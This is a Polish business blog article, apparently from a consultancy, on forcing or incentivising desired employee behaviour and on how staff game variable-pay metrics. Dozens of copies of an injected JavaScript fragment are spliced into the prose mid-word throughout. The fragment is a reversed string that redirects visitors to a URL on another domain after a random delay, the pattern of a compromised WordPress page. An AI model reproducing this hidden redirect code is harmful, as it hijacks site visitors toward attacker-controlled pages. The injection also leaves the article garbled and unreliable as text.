In Artykuły, Handel, Uniwersalne

W zarządzaniu pracownikami firmie zwykle chodzi nie tyle o motywację, ile o wymuszenie zachowań zgodnych z interesem firmy.

Tymczasem interesy pracownika i firmy z założenia się nie pokrywają. Interesy pracownika da się (potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobnie jak w równoległoboku sił w fizyce) rozłożyć na dwie skłatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowe. Zawsze da się tam wyodrębnić skłatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dową neutralną, a drugą na osi interesu firmy. I albo ta skłatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowa jest zgodna z interesem firmowym, jak w wersji 1, lub jest sprzeczna z interesem firmy, jak w wersji 2.

Uwaga. „pracownik zawsze wybierze swój interes”. Gdyż jest mu zawsze bliższy. Jedyne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to można zrobić, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to albo go przekonać, że są zbieżne, ale wymusić zachowania.

Skłatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowa neutralna tak naprawdę nie jest w pełni neutralna, gdyż angażuje zasoby i czas, jaki inaczej pracownik poświęciłby firmie. I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to o proporcje między skłatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowymi trwa walka w zarządzaniu.

Jakie zachowania firma chce wymusić na pracowniku?

Takie, które z jednej strony zapewnią wykorzystanie pierwszych 80% możliwości Modelu Biznesowego firmy (w postaci zarządzania codziennością), a jeśli toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to uda się osiągnąć, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sięgnąć po toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe 20% możliwości, już is toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totnie modyfikując zachowania.

Uwaga. „czy firma wie, czego wymaga?” To zdarza się częs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to. Firma wymusza zachowania, ale bez światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domości jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wpływa na funkcjonowanie jej Modelu Biznesowego. Wtedy pracownik zachowuje się tak, jak od niego oczekują, ale firma nic z tego nie ma. To ma znaczenie wtedy, gdy zachowania pożądane nie są zgodne z interesem firmy.

Sterowanie odbywa się na poziomie dwóch formuł

Pierwsze toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy fundamentów Modelu Biznesowego, po stronie nakładów i kosztów, a drugie na poziomie zarządzania Konceptem Sprzedażowym, tą częścią Modelu którą odczuwa i z którą styka się klient. Jej działanie opisuje magiczna formuła sprzedaży i tu też najwięcej można osiągnąć po stronie modyfikacji zachowań pracowników.

Działanie Konceptu Sprzedażowego opisuje magiczna formuła sprzedaży.

Zarządzanie formułą sprzedaży odbywa się na kilku poziomach, z których kluczowy dla zarządzania jest poziom czwarty, czyli właśnie poziom zachowań pracownika.

Zarządzanie magiczną formułą sprzedaży

Zarządzanie formułą odbywa się na poziomie zarządzania codziennością, co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy pierwszych 80% możliwości Modelu, jak i na poziomie zarządzania formułą (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowe 20%).

Tak czy inaczej trzeba zmodyfikować zachowania pracowników. Jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić?

Jak zmodyfikować zachowanie pracowników?

Można wymuszać, można przekupić, a można spróbować przekonać.

Wymuszone zachowania. Tu nie liczy się na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrą wolę, tylko na wymuszoną konieczność.

Porównanie me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tod wymuszania.

Menedżer z pracownikiem. To sytuacja przymusowa, gdzie procedurę zastępuje menedżer. To me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toda, gdzie słabością jest zawsze lokalna wersja pożądanych zachowań oraz zawsze lokalne umiejętności i motywacja menedżera. Ale silną stroną jest jej elastyczność, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do której daleko nawet najlepiej napisanej procedurze.

Procedury i kontrola. Tu wzorzec zachowań jest ustalany centralnie, co ma tę toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrą stronę, że powinien najlepiej odzwierciedlać wymagania Modelu Biznesowego. Ale też każde wdrożenie Modelu jest inne, więc lokalne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasowanie by się jednak przydało.

Sytuacje przymusowe. To np. toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrze witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczne stroje pracowników albo punkty obsługi. Tu pracownicy nie mogą się ukryć, gdyż klienci sami ich wypatrzą. Tak samo działa ograniczenie powierzchni zaplecza, ale też przesunięcie miejsc pracy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do miejsc, gdzie są klienci. Tu sama sytuacja wymusza pożądane zachowania. Słabością tego bardzo skutecznego rozwiązania jest wymyślenie odpowiednich sytuacji przymusowych, a także toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasowanie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tego infrastruktury placówek. Jeśli zaś źle się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasuje, straty są trwałe właśnie ze względu na konieczność toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopasowania infrastruktury.

Intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doktrynacja. To próba przekonania pracownika, że jego interes pokrywa się z interesem firmy. To bardzo skuteczne, ale krótkotrwałe. W końcu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojdzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do konfliktu i wtedy pracownik uzmysłowi sobie rozbieżność. A wtedy zmieni swoją postawę.

Płaca. Chyba najpowszechniejszy sposób na modyfikowanie zachowań pracownika, w postaci zmiennego systemu wynagradzania, zależnego od pożądanych zachowań.

Uwaga. „płaca za efekt”. Nawet jeśli wynagrodzenie jest za efekt, a nie za zachowania, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to i tak trzeba je na nie przełożyć. Inaczej pracownik wie, czego się od niego oczekuje, ale nie wie, jak toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to osiągnąć.

Sposób toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobry, ale krótkotrwały. Pracownik się przyzwyczaja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do części zmiennej i traktuje jako należne. A wtedy już nie zmieniają one jego zachowania. Także większość i tak nie zależy od pracownika, tylko od całego Modelu, więc jakiś poziom zostanie osiągnięty nawet bez jego starania, a on tylko z tego skorzysta. Za toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to płaca ma is toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totne znaczenie negatywne, jeśli jest poniżej poziomu rynkowego czy tylko oczekiwań pracownika (cała, łącznie z częścią zmienną), toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest on trwale zdemotywowany.

Jakie są funkcje płacy?

Mają tak zmodyfikować interes pracownika (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodając interes materialny w postaci płacy), żeby stał się zbieżny z interesem firmy.

W założeniu część zmienna płacy ma modyfikować zachowanie pracownika. Schemat działania można prześledzić na podstawie sterowania sprzedażą w obsłudze intensywnej.

Jak sterować sprzedażą przy pomocy płacy?

Jednym z najlepszych sposobów zarządzania formułą sprzedaży jest zarządzanie zachowaniami pracowników. Tu zaś wydaje się, że bardzo pomógłby zmienny system wynagrodzeń, związany z wykonaniem zadań wynikających z zarzadzania formułą.

Mało na parametr. Przy pięciu wskaźnikach na każdy z parametrów przypada 1/5 części zmiennej. Jeśli toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to 500 zł, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na jednym wskaźniku pracownik może zarobić 100. Ale z tych 100 nigdy nie będzie zero, przecież zawsze jest jakaś część bazowa wskaźnika. A jeśli firma nagradza wzrost, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to część tego wzrostu jest i tak, nawet bez ingerencji pracownika. Wtedy ten, który się stara zarobi 100, a ten który wcale, 70. To war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się starać za 30?

Zawsze jest jakaś część bazowa. Wskaźniki nie wahają się od zera toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości oczekiwanej. Nawet jeśli nic się z nimi nie robi (nie zarządza się formułami) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to i tak mają jakiś poziom samoistny. A także część ewentualnego wzrostu zależy od czynników, na który pracownik i tak nie ma wpływu. Ale czemu nie skorzystać?

Maksymalizować najłatwiejszy parametr. To strategia wygrywająca. Tu zamiast starać się w 5-ciu obszarach, co i tak jest praktycznie niewykonalne, trzeba wybrać ten parametr, który jest najłatwiejszy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do uzyskania, albo przynosi największą korzyść. I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docelowo zupełnie zaniedbać 3, a skupić się na 2-ch.

Parametry częściowo się znoszą. Większa konwersja toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na ogół mniejsza kwota transakcji. Czasem dlatego, że najłatwiej ją zwiększyć sprzedając tanie produkty impulsowe. Wtedy dzieje się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to przynajmniej z korzyścią dla firmy. Gorzej, gdy pracownicy próbują dzielić jedną transakcję na kilka, np. sprzedając osobno akcesoria. Wtedy jest wzrost konwersji, a sprzedaż taka sama.

Czasem też pracownicy korzystają z trendów, na które nie mają wpływu. Np. jeśli firma traci rynek, oznacza toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na ogół spadek odwiedzalności. Ale konwersja rośnie, gdyż najpierw odpadają najmniej zdecytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowani, o najniższej konwersji. Nie ma się z czego cieszyć, ale pracownicy wykażą poprawę wskaźnika.

Dla pracownika i tak liczy się średnia ze wszystkich wskaźników.

Jak widać, zmienność 5-ciu składników jest taka, że średnia i tak się prawie nie zmienia. To po co się starać?

Zawsze są wskaźniki łatwiejsze i trudniejsze toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do uzyskania, a także takie, które przynoszą więcej za mniej, albo mniej. Pracownicy o tym wiedzą i wbrew intencji firmy wybierają sobie, który wskaźnik chcą osiągnąć, co z punktu widzenia firmy znaczy, że wybierają obszar, gdzie będą się starać. A tym samym, gdzie nie będą.

Uwaga. „przerzucanie”. Jeśli pracownik widzi, że w danym miesiącu nie uda mu się uzyskać wskaźnika, może skupić się na innym, ale na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to może już być za późno. Za toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to może próbować część wskaźnika przerzucić na kolejny miesiąc. Nie zawsze jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to możliwe, ale częs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest. Można np. poprosić klienta (co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy większych zakupów inwestycyjnych), żeby opóźnił zakup o kilka dni, można też opóźnić toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostawę. Wtedy wskaźnik w jednym miesiącu jest stracony, ale w kolejnym łatwy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do uzyskania. Pracownik zyska bonus, a firma sprzeda tyle samo.

Podsumowanie

Firma stara się, aby pracownicy zachowywali się zgodnie z pożądanym przez nią wzorcem. W tym celu musi zmodyfikować interes pracownika, aby pokrywał się z interesem firmy albo wymusić pożądane zachowania. Można toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić na wiele sposobów, w tym pozornie najłatwiej zmiennym systemem wynagrodzenia. Pracownik toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostanie część zmienną, jeśli zachowa się tak, jak powinien lub częściej gdy osiągnie pożądany wynik. Ale toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to teoria. W praktyce i tak część zmienna/parametr jest mała, w toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatku tylko częściowo zależy od pracownika, a w większości od firmy czy o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenia. Ale pracownik i tak może z tego skorzystać, a jeśli nie ma wzrostu, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ma mieć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do kogo pretensje.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.